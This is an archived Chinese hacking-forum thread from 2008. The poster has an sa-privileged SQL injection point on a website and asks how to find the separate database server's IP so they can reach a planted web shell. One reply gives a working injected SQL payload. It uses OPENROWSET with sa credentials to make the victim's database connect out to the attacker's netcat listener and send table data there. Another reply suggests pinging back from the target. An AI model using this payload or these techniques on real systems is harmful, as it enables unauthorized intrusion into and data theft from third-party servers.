Board logo

标题: [讨论]web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip [打印本页]

作者: valen886    时间: 2008-7-24 17:25     标题: [讨论]web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip

[讨论]web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip
议题作者:ffjjc0000
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

web服务器与sql服务器分开sa权限不能执行命令怎么得到它的ip
得到了一个网站的注入点是sa权限的,但是不能执行命令,能备份shell但是不知道ip不能连接,请问有什么好方法没有
帖子3 精华0 积分16 阅读权限40 性别男 在线时间17 小时 注册时间2006-5-6 最后登录2008-5-31 查看详细资料TOP 赚更多的钱


dingking
荣誉会员

作者: LOVE    时间: 2008-7-24 17:25

本地NC一个端口...

执行如下命令:
复制内容到剪贴板
代码:
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=你的IP,你的端口;', 'select * from dest_table') select * from src_table;--昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-22 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

bluenight
晶莹剔透§烈日灼然
作者: liuyi008    时间: 2008-7-24 17:25

1.如果是sa权限,而且可以执行命令,本机装个瑞星防火墙,ping下你的ip 这样你可以看到了
2.如果是db权限.public好像不可以,用楼上的即可

第2具体方法,我帮你搜到了一篇文章:

http://xherman.blog.com.cn/archives/2006/1800439.shtml
帖子30 精华0 积分93 阅读权限40 性别女 在线时间65 小时 注册时间2007-7-22 最后登录2008-5-15 查看个人网站
查看详细资料TOP 软件项目外包

ffjjc0000
晶莹剔透§烈日灼然
作者: 小枫    时间: 2008-7-24 17:25

谢谢大家 我去实验下
帖子3 精华0 积分16 阅读权限40 性别男 在线时间17 小时 注册时间2006-5-6 最后登录2008-5-31 查看详细资料TOP

逗号
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2